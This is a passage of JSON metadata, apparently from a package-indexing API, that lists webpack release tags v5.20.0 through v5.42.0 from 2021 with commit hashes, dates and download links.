ab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed